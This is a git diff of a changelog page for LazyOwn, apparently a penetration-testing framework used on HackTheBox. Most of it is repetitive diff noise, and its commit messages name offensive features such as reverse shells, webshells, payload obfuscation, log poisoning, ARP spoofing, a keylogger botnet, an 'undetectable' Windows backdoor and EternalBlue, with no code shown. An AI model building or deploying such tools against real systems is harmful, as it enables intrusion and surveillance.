Otros
relative/path/show/in/searchexploit when you use the flag -x :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
command dsnmap :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
machine Runner.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
@@ -9342,223 +9368,223 @@
Otros
:)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
command :) samrdump
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 news
script bruteforce on modules :) :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command dnsenum :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
command dig
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
command dig
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
commands :)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
commands :) to se use tab tab or ?
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new payloads in sessions directory :) :) :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new exploits :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new command run lazywerkzeugdebug
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new commands createhash, createwebshell, sqlmap, proxy,
john2hash
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create internal_discover.sh
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 2 new exploit external :D working like a charm
-Otros
Otros
+Otros
- new exploit werkzeug in debug mode lettle retocated to run in
python3 from searchsploit :D
-Otros
Otros
+Otros
- new command: exploits externals :D
-Otros
Otros
+Otros
- new command: smbmap whattomap ex: smbmap tmp :D
-Otros
Otros
+Otros
- go buster new parameter url to use url from payload not rhost
-Otros
Otros
+Otros
- parameter added to gospider url to use var url in payload not rhost
@@ -9566,66 +9592,66 @@
Otros
parameter to /etc/hosts not now to windows sistems sorry
-Otros
Otros
+Otros
- refactor global var rhost deleted other ones
-Otros
Otros
+Otros
- path hijacking add line to temp bash script
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new command: wfuzz :D and you can add example a hide line option
like # wfuzz –hl=9 to hide responses with long line to 9
-Otros
Otros
+Otros
- new command: run lazyssh77enum to enum using a wordlist and exploit
foound searchsploit as openssh 7.7
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- smbclient command and exploit to enum ssh i used in a machine of
@@ -9633,269 +9659,269 @@
Otros
xD
-Otros
Otros
+Otros
- Merge pull request #22 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new command getseclist :D
-Otros
Otros
+Otros
- payload.json to play on hackthebox :D
-Otros
Otros
+Otros
- port a python del exploit archiconocido de meta exploit vsftpd
3.0.3
-Otros
Otros
+Otros
- shell payload in python generated by msfvenom automated by lazyown
framework ;)
-Otros
Otros
+Otros
- new commit to check if alsr is activated in the kernel
-Otros
Otros
+Otros
- deleted shells generated by the script
-Otros
Otros
+Otros
- upx to shells generated by msfvenom automated by lazyown framework
;)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new path to diccionary to run by default in parrot
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #21 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy ntlmv2 firstaproach using in hashes.txt the ouput smbserver
command when the conection is established
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy get smbserver with impacket :) and then you can sudo
@@ -9903,1354 +9929,1354 @@
Otros
simple smbserver in LazyOwn console
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn FTP sniff prety messages :)
-Otros
Otros
+Otros
- LazyOwn keygen to generate keys to use in payload.json to cypher the
conections
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn http sniff :( not working fine yet
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn ArpSpoofing README and banner :P [;,;]
-Otros
Otros
+Otros
- LazyOwn ArpSpoofing [;,;]
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy Log more lfi list :)
-Otros
Otros
+Otros
- Lazy Log Poisonig more poison bro
-Otros
Otros
+Otros
- Lazy Log Poisonig in ssh first aproach
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Delete lazylogpisoning.py
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- #!/usr/bin/env python3 #_*_ coding: utf8 _*_
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
- add #!/usr/bin/env python3 #_*_ coding: utf8 _*_
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- tentativas de herramientas nuevas
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- imlementacion de libreria pwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- mejora en la webshell de python
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- return jsonify({“error”: “error”}), 500
-Otros
Otros
+Otros
- Fix code scanning alert - Information exposure through an exception
#16
-Otros
Otros
+Otros
- Fix code scanning alert - Flask app is run in debug mode #17
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nueva interfaz web experimental
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nuevo bot de investigacion
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
- New BotNet with Keylogger
-Otros
Otros
+Otros
- Merge pull request #13 from grisuno/grisuno-patch-7
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create pull_request_template.md
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create pull_request_template.md
-Otros
Otros
+Otros
- device to sniff parametric
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nuevo modulo de gathering
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nueva estructura de directorios
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #10 from grisuno/grisuno-patch-6
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #8 from grisuno/grisuno-patch-6
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyown_metaextract0r.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyown_bprfuzzer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #6 from grisuno/grisuno-patch-5
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update lazyreverse_shell.sh
-Otros
Otros
+Otros
- Merge pull request #5 from grisuno/grisuno-patch-4
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyreverse_shell.sh
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update LazyOwnExplorer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create LazyOwnExplorer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #4 from grisuno/grisuno-patch-3
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create CODE_OF_CONDUCT.md
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #3 from grisuno/grisuno-patch-2
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #1 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- ██╗ █████╗ ███████╗██╗ ██╗ ██████╗ ██╗ ██╗███╗ ██╗ ██║
@@ -11261,64 +11287,64 @@
Otros
╚══╝╚══╝ ╚═╝ ╚═══╝
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create bin_data_relevant.csv
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create detailed_search.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update README.md
diff --git a/docs/index.html.bak b/docs/index.html.bak
index 571698d4..a4830807 100644
--- a/docs/index.html.bak
+++ b/docs/index.html.bak
@@ -6127,6 +6127,20 @@ the scope where this function is used.
Otros
+- test(test): test Version: release/0.1.64 test Modified file(s):-
+.gitignore - COMMANDS.md - README.md - UTILS.md - docs/COMMANDS.html -
+docs/README.html - docs/UTILS.html - docs/index.html -
+docs/index.html.bak - firefox.dmp - lazyown - utils.pyfile(s):-
+firefox.dmpLazyOwn on HackTheBox:
+https://app.hackthebox.com/teams/overview/6429 LazyOwn/
+https://grisuno.github.io/LazyOwn/ Fecha: Fri Oct 18 01:37:16 2024 -0300
+Hora: 1729226236
+
+
+Pruebas
+Otros
+
+
- test(test): test Version: release/0.1.64 image banner responsive
Modified file(s):- README.md - banner.py - docs/README.html -
docs/index.html - docs/index.html.bak - firefox.dmpLazyOwn on
@@ -6135,8 +6149,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Fri Oct 18 01:30:10 2024 -0300
Hora: 1729225810
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.64 test Modified file(s):-
@@ -6147,8 +6161,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Oct 17 23:48:09 2024 -0300
Hora: 1729219689
-Otros
Otros
+Otros
- feature(feat): new commands documented at COMMANDS.md Version:
@@ -6164,8 +6178,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Oct 15 23:55:33 2024 -0300
Hora: 1729047333
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.63 test Modified file(s):-
@@ -6175,8 +6189,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Oct 15 21:48:53 2024 -0300
Hora: 1729039733
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): no test Version: release/0.1.63 testing Modified
@@ -6187,8 +6201,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Oct 15 21:39:48 2024 -0300
Hora: 1729039188
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.63 test Modified file(s):-
@@ -6200,8 +6214,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Oct 15 02:57:20 2024 -0300
Hora: 1728971840
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deply Version: release/0.1.63 new Modified file(s):-
@@ -6212,8 +6226,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Oct 15 02:52:56 2024 -0300
Hora: 1728971576
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deploy Version: release/0.1.63 Modified file(s):-
@@ -6227,7 +6241,7 @@ Hora: 1728903057
Refactorización
-Otros
+Otros
- refactor(refactor): hashs Version: release/0.1.63 new logic of get
@@ -6240,8 +6254,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Mon Oct 14 04:27:17 2024 -0300
Hora: 1728890837
-Otros
Otros
+Otros
- feature(feat): new commands documented at COMMANDS.md Version:
@@ -6255,8 +6269,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sun Oct 13 01:52:12 2024 -0300
Hora: 1728795132
-Otros
Otros
+Otros
- feature(feat): new commands like emp3r0r,
@@ -6276,7 +6290,7 @@ Hora: 1728716856
Refactorización
-Otros
+Otros
- refactor(refactor): refactor of users.txt Version: release/0.1.61
@@ -6291,7 +6305,7 @@ Hora: 1728710268
Refactorización
-Otros
+Otros
- refactor(refactor): refactor lazy_ruberdigispark isnto duckyspark
@@ -6306,7 +6320,7 @@ Hora: 1728627610
Documentación
-Otros
+Otros
- docs(docs): trasnlated nmap script Version: release/0.1.61 and add
@@ -6318,7 +6332,7 @@ Hora: 1728627550
Refactorización
-Otros
+Otros
- refactor(refactor): nmap Version: release/0.1.61 nmap script was
@@ -6330,15 +6344,15 @@ https://grisuno.github.io/LazyOwn/ Fecha: Fri Oct 11 00:52:41 2024 -0300
Hora: 1728618761
-Otros
Otros
+Otros
Nuevas características
-Otros
+Otros
- feat(feat): New Feature Automate Arduino Attacks or AAA the command
@@ -6352,7 +6366,7 @@ Hora: 1728596519
Nuevas características
-Otros
+Otros
- feat(feat): finger_user_enum Version: release/0.1.60 new
@@ -6366,7 +6380,7 @@ Hora: 1728517885
Nuevas características
-Otros
+Otros
- feat(feat): trasnform Version: release/0.1.59 command documented at
@@ -6379,7 +6393,7 @@ Hora: 1728452441
Correcciones
-Otros
+Otros
- fix(fix): bug fixing Version: release/0.1.58 int the dunction do_ssh
@@ -6392,7 +6406,7 @@ Hora: 1728423452
Correcciones
-Otros
+Otros
- fix(fix): tags Version: release/0.1.57 xd Modified file(s):-
@@ -6403,7 +6417,7 @@ Hora: 1728423380
Refactorización
-Otros
+Otros
- refactor(refactor): refactor de find y nc Version: release/0.1.56
@@ -6416,8 +6430,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Oct 8 02:16:54 2024 -0300
Hora: 1728364614
-Otros
Otros
+Otros
- feature(feature & refactor): new commands and refactor Version:
@@ -6435,7 +6449,7 @@ Hora: 1728262185
Nuevas características
-Otros
+Otros
- feat(feat): automsf Version: release/0.1.55 new command documented
@@ -6448,8 +6462,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sun Oct 6 03:25:28 2024 -0300
Hora: 1728195928
-Pruebas
-Otros
+Pruebas
+Otros
- test(new machine return): is a nice machine :P Version:
@@ -6461,8 +6475,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sun Oct 6 02:19:22 2024 -0300
Hora: 1728191962
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): new machine yummy.htb found a command in find to reverse
@@ -6478,7 +6492,7 @@ Hora: 1728144123
Nuevas características
-Otros
+Otros
- feat(feat): new attack mfscosole automated Version: release/0.1.54
@@ -6492,8 +6506,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sat Oct 5 01:44:12 2024 -0300
Hora: 1728103452
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): testing DEPLOY.sh script Version: release/0.1.53 to
@@ -6507,7 +6521,7 @@ Hora: 1728103285
Documentación
-Otros
+Otros
- docs(docs): nueva documentacion comando evidence Version:
@@ -6519,8 +6533,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sat Oct 5 01:18:45 2024 -0300
Hora: 1728101925
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): lazyown infinite glitch storage Version: release/0.1.53
@@ -6533,7 +6547,7 @@ Hora: 1728016386
Correcciones
-Otros
+Otros
- fix(fix): fix in find command Version: release/0.1.53 command find
@@ -6545,7 +6559,7 @@ Hora: 1728012485
Refactorización
-Otros
+Otros
- refactor(refactor): refactor de credentials de evilwinrm de psexec,
@@ -6560,7 +6574,7 @@ Hora: 1727841476
Nuevas características
-Otros
+Otros
- feat(feat): eternalblue Version: release/0.1.52 and scanner in
@@ -6572,8 +6586,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Oct 1 01:42:32 2024 -0300
Hora: 1727757752
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deleting users from ctf game from repo Version:
@@ -6585,8 +6599,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Oct 1 00:06:24 2024 -0300
Hora: 1727751984
-Otros
Otros
+Otros
- feature(feat): new commands and functionalities Version:
@@ -6600,7 +6614,7 @@ Hora: 1727591718
Refactorización
-Otros
+Otros
- refactor(refactor): smbclient refactor, cme refactor, netexec,
@@ -6620,7 +6634,7 @@ Hora: 1727507083
Nuevas características
-Otros
+Otros
- feat(feat): new command Shadowsocks Version: release/0.1.50 with
@@ -6632,8 +6646,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Sep 25 22:59:45 2024 -0300
Hora: 1727315985
-Otros
Otros
+Otros
- feature(feat): now we are vip Version: release/0.1.49 Modified
@@ -6646,7 +6660,7 @@ Hora: 1727071043
Nuevas características
-Otros
+Otros
- feat(feat): new commands documented at COMMANDS.md Version:
@@ -6659,8 +6673,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sun Sep 22 22:12:21 2024 -0300
Hora: 1727053941
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): some test and new resources and externals scripst to
@@ -6674,7 +6688,7 @@ Hora: 1727047373
Nuevas características
-Otros
+Otros
- feat(feat): new cool stuff xD Version: release/0.1.47 parse id rsa
@@ -6687,7 +6701,7 @@ Hora: 1726349393
Nuevas características
-Otros
+Otros
- feat(win backdoor): undetectable Version: release/0.1.46 handcrafted
@@ -6700,7 +6714,7 @@ Hora: 1726300513
Correcciones
-Otros
+Otros
- fix(fix): c2 insecure filename Version: release/0.1.45 resolved
@@ -6712,7 +6726,7 @@ Hora: 1726299774
Documentación
-Otros
+Otros
- docs(docs): documented resources, and externals, and one command
@@ -6726,8 +6740,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sat Sep 14 03:10:13 2024 -0300
Hora: 1726294213
-Otros
Otros
+Otros
- feature(new commands): documented at COMMANDS.md Version:
@@ -6742,8 +6756,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Sep 12 03:37:43 2024 -0300
Hora: 1726123063
-Otros
Otros
+Otros
- feature(feat): new commands: scarecrow, createmail, eyewitness,
@@ -6757,8 +6771,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Sep 11 02:46:35 2024 -0300
Hora: 1726033595
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): install Version: release/0.1.42 dou you seaw [3~pip
@@ -6770,8 +6784,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Sep 11 02:10:10 2024 -0300
Hora: 1726031410
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): install Version: release/0.1.42 testing… Modified
@@ -6784,7 +6798,7 @@ Hora: 1725946883
Nuevas características
-Otros
+Otros
- feat(feat): graph Version: release/0.1.42 integrated at index2.html
@@ -6797,7 +6811,7 @@ Hora: 1725944061
Nuevas características
-Otros
+Otros
- feat(feat): 2 new commands Version: release/0.1.41 shellfire,
@@ -6809,8 +6823,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Mon Sep 9 20:45:20 2024 -0300
Hora: 1725925520
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): install testing Version: release/0.1.40 reported by user
@@ -6822,7 +6836,7 @@ Hora: 1725885388
Correcciones urgentes
-Otros
+Otros
- hotfix(hotfix): install wa broken Version: release/0.1.40 infinite
@@ -6833,8 +6847,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Mon Sep 9 09:25:02 2024 -0300
Hora: 1725884702
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): emire Version: release/0.1.39 empire xD Modified
@@ -6846,8 +6860,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sun Sep 8 05:35:22 2024 -0300
Hora: 1725784522
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): veil Version: release/0.1.39 new evasion tool testing
@@ -6859,8 +6873,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sun Sep 8 04:46:46 2024 -0300
Hora: 1725781606
-Otros
Otros
+Otros
- feature(feat): now tord, trace, and generatedic to generate
@@ -6874,8 +6888,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sat Sep 7 01:41:09 2024 -0400
Hora: 1725687669
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): testing new feature tord Version: release/0.1.38
@@ -6887,8 +6901,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Fri Sep 6 03:29:03 2024 -0400
Hora: 1725607743
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): ivy shellcodes test Version: release/0.1.38 new command
@@ -6901,7 +6915,7 @@ Hora: 1725605766
Documentación
-Otros
+Otros
- docs(docs): new alias Version: release/0.1.38 new alias tor
@@ -6914,7 +6928,7 @@ Hora: 1725515362
Documentación
-Otros
+Otros
- docs(docs): corrections in text Version: release/0.1.38 and some
@@ -6926,7 +6940,7 @@ Hora: 1725514958
Documentación
-Otros
+Otros
- docs(docs): new links Version: release/0.1.38 automatic download
@@ -6939,7 +6953,7 @@ Hora: 1725513720
Documentación
-Otros
+Otros
- docs(docs): better docs Version: release/0.1.38 is zen now :)
@@ -6952,7 +6966,7 @@ Hora: 1725431518
Nuevas características
-Otros
+Otros
- feat(fet): msfpc Version: release/0.1.38 automation Modified
@@ -6964,8 +6978,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Sep 3 01:15:14 2024 -0400
Hora: 1725340514
-Otros
Otros
+Otros
- feature(feat): comandos nuevos documentados en commands.md Version:
@@ -6977,8 +6991,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Mon Sep 2 23:34:25 2024 -0400
Hora: 1725334465
-Otros
Otros
+Otros
- feature(feat): new command apache_users & new options -p to use
@@ -6995,7 +7009,7 @@ Hora: 1725183931
Documentación
-Otros
+Otros
- docs(docs): documented malwarebazar Version: release/0.1.35 Fetches
@@ -7009,7 +7023,7 @@ Hora: 1725164493
Documentación
-Otros
+Otros
- docs(docs): documentating Version: release/0.1.35 functions dacledit
@@ -7021,8 +7035,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sun Sep 1 00:13:39 2024 -0400
Hora: 1725164019
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -7041,8 +7055,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 31 06:21:44 2024 -0400
Hora: 1725099704
-Otros
Otros
+Otros
- feature(feat): nuevos comandos documetados en COMMANDS.md Version:
@@ -7056,8 +7070,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 30 23:33:30 2024 -0400
Hora: 1725075210
-Otros
Otros
+Otros
- feature(feat): nuevos comandos documentados en COMMANDS.md Version:
@@ -7071,7 +7085,7 @@ Hora: 1725001665
Correcciones urgentes
-Otros
+Otros
- hotfix(hotfix): deleted the insecure chat Version: release/0.1.32
@@ -7083,8 +7097,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 30 02:58:04 2024 -0400
Hora: 1725001084
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -7098,8 +7112,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 28 23:02:18 2024 -0400
Hora: 1724900538
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -7114,7 +7128,7 @@ Hora: 1724741263
Correcciones
-Otros
+Otros
- fix(fix): some fixes in c2 Version: release/0.1.29 now curl attack
@@ -7126,7 +7140,7 @@ Hora: 1724738020
Nuevas características
-Otros
+Otros
- feat(kick): to kick from net some ip Version: release/0.1.28 seend
@@ -7139,8 +7153,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Aug 27 00:53:52 2024 -0400
Hora: 1724734432
-Otros
Otros
+Otros
- feature(new command c2 documentad at COMMANDS.md): a little botnet
@@ -7154,7 +7168,7 @@ Hora: 1724656041
Correcciones
-Otros
+Otros
- fix(fix auto exploit cacti rce logged): now the attack work
@@ -7166,8 +7180,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Mon Aug 26 02:18:44 2024 -0400
Hora: 1724653124
-Otros
Otros
+Otros
- feature(new commands docummented at COMMANDS.md): waybackmachine,
@@ -7181,8 +7195,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 24 23:28:31 2024 -0400
Hora: 1724556511
-Otros
Otros
+Otros
- feature(2 new attacks): docummented at COMMANDS.md Version:
@@ -7194,8 +7208,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 24 15:22:18 2024 -0400
Hora: 1724527338
-Pruebas
-Otros
+Pruebas
+Otros
- test(new machine): monitorsthree.htb Version: release/0.1.23
@@ -7207,7 +7221,7 @@ Hora: 1724483709
Refactorización
-Otros
+Otros
- refactor(new payload): in msfvenom Version: release/0.1.23 :) java
@@ -7219,7 +7233,7 @@ Hora: 1724478302
Nuevas características
-Otros
+Otros
- feat(new feature): padbuster Version: release/0.1.23 new command
@@ -7232,7 +7246,7 @@ Hora: 1724472682
Documentación
-Otros
+Otros
- docs(documentacion): nueva versiòn en la web reflejada en el banner
@@ -7244,7 +7258,7 @@ Hora: 1724472227
Documentación
-Otros
+Otros
- docs(new documentation): better documentation to commands and utils
@@ -7257,7 +7271,7 @@ Hora: 1724470232
Nuevas características
-Otros
+Otros
- feat(new feat in createdll): new option 3 to run automate create dll
@@ -7271,7 +7285,7 @@ Hora: 1724469194
